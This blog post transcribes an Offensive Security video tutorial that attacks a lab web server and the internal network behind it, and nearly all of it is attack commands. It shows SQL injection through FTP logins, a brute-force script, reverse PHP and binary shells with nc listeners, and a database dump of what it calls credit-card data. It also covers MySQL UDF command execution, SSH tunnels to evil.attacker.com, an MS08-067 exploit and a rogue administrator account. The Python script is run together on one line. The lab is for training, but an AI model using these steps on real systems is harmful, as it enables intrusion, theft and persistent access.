I think there is no need to introduce offensive security, I was searching on Internet and I have found a wonderful video tutorial made by offensive security team.
This video will teach you about remote penetration testing and how to enumerate and map the internal network of a web server (database, SMS and other servers). Although this video has been created on previous version of backtrack but it is applicable on backtrack 5 r1 because tools are common.
Commands & Tools that Discussed on the Video
ftp-brute.py
#!/usr/bin/pythonfrom ftplib import FTPprint "Attempting user Directory Discover via FTP"for i in range(0,6):username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; -- "password=str("1")ftp=FTP('www.offseclabs.com')ftp.login(username,password)print "Logged in as user "+str(i)+",1"ftp.retrlines('LIST')ftp.close()
Open Terminal A :
nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear
ftp www.offseclabs.com
username - bob
password - bob
(To enumerate the ftp server)
ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --
password - 1
(logged in to the ftp server)
pwd
ls
bye
clear
cd core
clear
nano brute.py --> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear
ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --
password - 1
(logged in as the fifth user)
ls
put rs.php --> (a reverse php shell) Download reverse PHP shell
-----------------------
Open Terminal B :
nc -lvp 80
-----------------------
Open Terminal C :
wget www.offseclabs.com/rs.php
(Then, at Terminal B, we got a reverse shell)
-----------------------
Go back to Terminal B :
(inside the reverse shell)
/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt
------------------------
Open a Firefox :
www.offseclabs.com/images/ccdump.txt
(we got the database dump)
-------------------------
Go back to Terminal A :
(inside the ftp server)
put up.html --> (file upload html file)
put up.php -- > (file upload php file)
-------------------------
Open Firefox :
www.offseclabs.com/up.html
(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)
** Details of lib_mysqludf_sys.so
---------------------------
Go back to Terminal A :
(quit the ftp server)
bye
clear
exit
(quit Terminal A)
----------------------------
Go back to Terminal B :
mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don't press Enter at this moment)
---------------------------
Open Terminal D :
nc -lvp 80
(go back to Terminal B and press enter, you will get reserver shell at Terminal D)
----------------------------
Open Terminal E :
nc -lvp 80
----------------------------
Go back to Terminal B :
(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');
(press enter and we got another reverse shell at Terminal E)
---------------------------
Go back to Terminal E :
(inside the reverse shell)
ping -c 1 10.150.0.20
clear
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)
-----------------------------
Open Terminal F :
netstat antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse
-----------------------------
Go back to Terminal D :
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)
clear
------------------------------
Go back to Terminal F :
cd core
nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444
(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add
---------------------------------
Go back to Terminal D :
(quit the tunnel)
exit
clear
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear
-----------------------------------
Open Terminal G :
netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1
(login to the 10.150.0.20 with username - hacker and password - hacker)
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.
No comments:
Post a Comment